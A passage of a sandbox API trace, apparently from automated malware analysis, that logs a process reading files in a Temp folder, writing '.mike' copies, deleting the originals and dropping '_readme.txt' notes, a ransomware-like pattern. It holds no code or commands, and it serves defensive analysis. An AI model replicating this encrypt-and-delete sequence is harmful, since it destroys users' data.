HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\umotufgg9rwo_.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.578] GetFileType (hFile=0x1d4) returned 0x1 [0147.578] GetFileType (hFile=0x1d4) returned 0x1 [0147.580] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=30720, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x7800 [0147.580] ReadFile (in: hFile=0x1d4, lpBuffer=0x223df90, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x223df90*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.581] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv.mike", lpFilePart=0x0) returned 0x47 [0147.581] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\umotufgg9rwo_.flv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.581] GetFileType (hFile=0x1d4) returned 0x1 [0147.581] GetFileType (hFile=0x1d4) returned 0x1 [0147.582] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x7a20 [0147.582] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", lpFilePart=0x0) returned 0x42 [0147.583] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\umotufgg9rwo_.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.583] GetFileType (hFile=0x1d4) returned 0x1 [0147.583] GetFileType (hFile=0x1d4) returned 0x1 [0147.583] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=40960, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xa000 [0147.583] ReadFile (in: hFile=0x1d4, lpBuffer=0x224af58, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x224af58*, lpNumberOfBytesRead=0x2af080*=0x125f, lpOverlapped=0x0) returned 1 [0147.584] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv.mike", lpFilePart=0x0) returned 0x47 [0147.584] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\umotufgg9rwo_.flv.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.584] GetFileType (hFile=0x1d4) returned 0x1 [0147.585] GetFileType (hFile=0x1d4) returned 0x1 [0147.585] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0xa220 [0147.585] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv.mike", lpFilePart=0x0) returned 0x47 [0147.585] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\umotufgg9rwo_.flv.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.586] GetFileType (hFile=0x1d4) returned 0x1 [0147.586] GetFileType (hFile=0x1d4) returned 0x1 [0147.587] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", lpFilePart=0x0) returned 0x42 [0147.587] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv.mike", lpFilePart=0x0) returned 0x47 [0147.588] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\umotufgg9rwo_.flv.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x213b84a0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x213b84a0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x21404760, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xb480)) returned 1 [0147.588] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", lpFilePart=0x0) returned 0x42 [0147.588] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv.mike", lpFilePart=0x0) returned 0x47 [0147.588] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\umotufgg9rwo_.flv.mike"), fInfoLevelId=0x0, lpFileInformation=0x225853c | out: lpFileInformation=0x225853c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x213b84a0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x213b84a0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x21404760, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xb480)) returned 1 [0147.589] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", lpFilePart=0x0) returned 0x42 [0147.589] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv", dwFileAttributes=0x80) returned 1 [0147.590] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\UmotUfgG9RWo_.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\umotufgg9rwo_.flv")) returned 1 [0147.592] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1d4 [0147.592] GetFileType (hFile=0x1d4) returned 0x1 [0147.593] GetFileType (hFile=0x1d4) returned 0x1 [0147.594] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\WFlPoVHCvo.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\wflpovhcvo.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.594] GetFileType (hFile=0x1d4) returned 0x1 [0147.595] GetFileType (hFile=0x1d4) returned 0x1 [0147.595] CloseHandle (hObject=0x1d4) returned 1 [0147.595] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0147.596] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\WFlPoVHCvo.mp4.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\wflpovhcvo.mp4.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.597] GetFileType (hFile=0x1d4) returned 0x1 [0147.597] GetFileType (hFile=0x1d4) returned 0x1 [0147.597] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0147.598] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\WFlPoVHCvo.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\wflpovhcvo.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.599] GetFileType (hFile=0x1d4) returned 0x1 [0147.599] GetFileType (hFile=0x1d4) returned 0x1 [0147.599] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0147.599] ReadFile (in: hFile=0x1d4, lpBuffer=0x225de48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x225de48*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.601] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\WFlPoVHCvo.mp4.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\wflpovhcvo.mp4.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.601] GetFileType (hFile=0x1d4) returned 0x1 [0147.601] GetFileType (hFile=0x1d4) returned 0x1 [0147.601] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0147.602] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\WFlPoVHCvo.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\wflpovhcvo.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.602] GetFileType (hFile=0x1d4) returned 0x1 [0147.602] GetFileType (hFile=0x1d4) returned 0x1 [0147.602] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x2800 [0147.603] ReadFile (in: hFile=0x1d4, lpBuffer=0x226adf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x226adf8*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.603] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\WFlPoVHCvo.mp4.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\wflpovhcvo.mp4.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.604] GetFileType (hFile=0x1d4) returned 0x1 [0147.604] GetFileType (hFile=0x1d4) returned 0x1 [0147.604] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x2a20 [0147.604] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\WFlPoVHCvo.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\wflpovhcvo.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.605] GetFileType (hFile=0x1d4) returned 0x1 [0147.605] GetFileType (hFile=0x1d4) returned 0x1 [0147.605] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=20480, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x5000 [0147.605] ReadFile (in: hFile=0x1d4, lpBuffer=0x2277da8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2277da8*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.606] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\WFlPoVHCvo.mp4.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\wflpovhcvo.mp4.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.606] GetFileType (hFile=0x1d4) returned 0x1 [0147.606] GetFileType (hFile=0x1d4) returned 0x1 [0147.606] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x5220 [0147.607] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\WFlPoVHCvo.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\wflpovhcvo.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.607] GetFileType (hFile=0x1d4) returned 0x1 [0147.607] GetFileType (hFile=0x1d4) returned 0x1 [0147.608] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=30720, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x7800 [0147.608] ReadFile (in: hFile=0x1d4, lpBuffer=0x2284d58, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2284d58*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.608] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\WFlPoVHCvo.mp4.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\wflpovhcvo.mp4.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.609] GetFileType (hFile=0x1d4) returned 0x1 [0147.609] GetFileType (hFile=0x1d4) returned 0x1 [0147.609] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x7a20 [0147.610] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\WFlPoVHCvo.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\wflpovhcvo.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.611] GetFileType (hFile=0x1d4) returned 0x1 [0147.611] GetFileType (hFile=0x1d4) returned 0x1 [0147.611] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=40960, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xa000 [0147.612] ReadFile (in: hFile=0x1d4, lpBuffer=0x2291d08, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2291d08*, lpNumberOfBytesRead=0x2af080*=0x2800, lpOverlapped=0x0) returned 1 [0147.612] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\WFlPoVHCvo.mp4.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\wflpovhcvo.mp4.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.612] GetFileType (hFile=0x1d4) returned 0x1 [0147.613] GetFileType (hFile=0x1d4) returned 0x1 [0147.613] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0xa220 [0147.613] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\WFlPoVHCvo.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\wflpovhcvo.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.614] GetFileType (hFile=0x1d4) returned 0x1 [0147.614] GetFileType (hFile=0x1d4) returned 0x1 [0147.614] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=51200, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0xc800 [0147.614] ReadFile (in: hFile=0x1d4, lpBuffer=0x229ecb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x229ecb8*, lpNumberOfBytesRead=0x2af080*=0x2230, lpOverlapped=0x0) returned 1 [0147.615] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\WFlPoVHCvo.mp4.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\wflpovhcvo.mp4.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.615] GetFileType (hFile=0x1d4) returned 0x1 [0147.615] GetFileType (hFile=0x1d4) returned 0x1 [0147.615] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0xca20 [0147.616] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\WFlPoVHCvo.mp4.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\wflpovhcvo.mp4.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.616] GetFileType (hFile=0x1d4) returned 0x1 [0147.616] GetFileType (hFile=0x1d4) returned 0x1 [0147.618] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\WFlPoVHCvo.mp4", dwFileAttributes=0x80) returned 1 [0147.618] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\WFlPoVHCvo.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\wflpovhcvo.mp4")) returned 1 [0147.620] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\_readme.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1d4 [0147.621] GetFileType (hFile=0x1d4) returned 0x1 [0147.621] GetFileType (hFile=0x1d4) returned 0x1 [0147.622] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\YJKC0SX0lp.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\yjkc0sx0lp.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.622] GetFileType (hFile=0x1d4) returned 0x1 [0147.622] GetFileType (hFile=0x1d4) returned 0x1 [0147.623] CloseHandle (hObject=0x1d4) returned 1 [0147.623] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0147.624] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\YJKC0SX0lp.pps.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\yjkc0sx0lp.pps.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.625] GetFileType (hFile=0x1d4) returned 0x1 [0147.625] GetFileType (hFile=0x1d4) returned 0x1 [0147.625] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0147.632] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\YJKC0SX0lp.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\yjkc0sx0lp.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.633] GetFileType (hFile=0x1d4) returned 0x1 [0147.633] GetFileType (hFile=0x1d4) returned 0x1 [0147.633] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0147.633] ReadFile (in: hFile=0x1d4, lpBuffer=0x22b417c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x22b417c*, lpNumberOfBytesRead=0x2af080*=0x21f1, lpOverlapped=0x0) returned 1 [0147.635] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\YJKC0SX0lp.pps.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\yjkc0sx0lp.pps.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.635] GetFileType (hFile=0x1d4) returned 0x1 [0147.636] GetFileType (hFile=0x1d4) returned 0x1 [0147.636] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0147.637] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\YJKC0SX0lp.pps.mike" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\yjkc0sx0lp.pps.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x1d4 [0147.637] GetFileType (hFile=0x1d4) returned 0x1 [0147.638] GetFileType (hFile=0x1d4) returned 0x1 [0147.640] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\YJKC0SX0lp.pps", dwFileAttributes=0x80) returned 1 [0147.640] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\YJKC0SX0lp.pps" (normalized: 